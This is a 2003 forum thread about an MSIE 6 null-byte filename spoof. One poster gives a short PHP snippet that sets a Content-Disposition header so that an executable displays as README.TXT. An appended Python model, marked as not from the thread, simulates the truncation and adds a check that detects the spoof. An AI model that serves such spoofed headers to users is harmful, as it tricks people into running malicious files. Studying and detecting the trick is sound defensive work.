mojo
Aug 13 2003, 01:33 PM
This is an older spoof...
http://www.securiteam.com/windowsntfocus/5...5DP0D1F61A.html
It works on all non-SP1 machines.
My friend had coded a PHP script that would do this, but I lost it. Anyone out there do this? It was only about 5 lines of code.
virus
Aug 13 2003, 03:49 PM
Yeah, this is quite an old exploit. What happens is that the malicious web server names a file to include a null byte, something like README.TXT%00PROG.EXE
So if you want to execute the program using PHP, then you have to add the following lines at the top of your PHP file to exploit MSIE 6:
| CODE |
<?php
// Spoofed name: MSIE 6 decodes %00 to a NUL byte and stops displaying the
// name there, so the user sees README.TXT while PROG.EXE is what gets run.
header("Content-Disposition: inline; filename=README.TXT%00PROG.EXE");
// The second header() call in the original post was garbled; text/css is
// the content type it appears to have been setting.
header("Content-Type: text/css");
?>
|
In this way, as soon as the user clicks the link, he will actually execute the malicious file. So... the problem is with the null byte that is added to the file name, and the .exe extension is not visible in the vulnerable MSIE browser.
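The client-side behaviour the post describes, modelled as an added example (this is not code from the original thread or from the SecurITeam advisory). It assumes the mechanism as stated above: the browser percent-decodes the filename parameter and then handles it as a C string, so everything after the first NUL byte drops out of the displayed name. The header values are constructed samples in the shape README.TXT%00PROG.EXE, and the `is_spoofed` check is the test a proxy or download handler would want: reject any decoded filename that still contains a control byte.

```python
"""Model of the MSIE 6 null-byte filename spoof discussed in the thread."""
import re
from urllib.parse import unquote

# Constructed sample Content-Disposition values (assumption: same shape as
# the README.TXT%00PROG.EXE name given in the post, not captured traffic).
SPOOFED = "inline; filename=README.TXT%00PROG.EXE"
BENIGN = 'attachment; filename="report.pdf"'


def filename_param(header_value):
    """Pull the raw (still percent-encoded) filename parameter out of the header."""
    m = re.search(r'filename\s*=\s*"?([^";]*)"?', header_value, re.I)
    return m.group(1) if m else None


def real_name(header_value):
    """The fully decoded name: what actually gets written and executed."""
    raw = filename_param(header_value)
    return None if raw is None else unquote(raw)  # '%00' -> '\x00'


def vulnerable_display_name(header_value):
    """What a NUL-truncating client (the MSIE 6 behaviour described) shows.

    Assumption: the name is treated as a C string after decoding, so the
    first NUL byte ends it and the .EXE part never reaches the dialog.
    """
    name = real_name(header_value)
    return None if name is None else name.split("\x00", 1)[0]


def extension(name):
    """Case-normalised extension of a decoded filename ('' if none)."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def is_spoofed(header_value):
    """Practitioner's check: decoded name contains a control byte, or the
    extension the user would see differs from the real one."""
    name = real_name(header_value)
    if name is None:
        return False
    if any(ord(c) < 0x20 for c in name):
        return True
    return extension(name) != extension(vulnerable_display_name(header_value))


if __name__ == "__main__":
    for hv in (SPOOFED, BENIGN):
        print(repr(hv))
        print("  displayed :", vulnerable_display_name(hv))
        print("  real      :", real_name(hv))
        print("  spoofed?  :", is_spoofed(hv))
```

Running it shows the spoofed header displaying as README.TXT while the real name still ends in PROG.EXE; a download handler that applies `is_spoofed` before showing the user a name would refuse that header and accept the benign one.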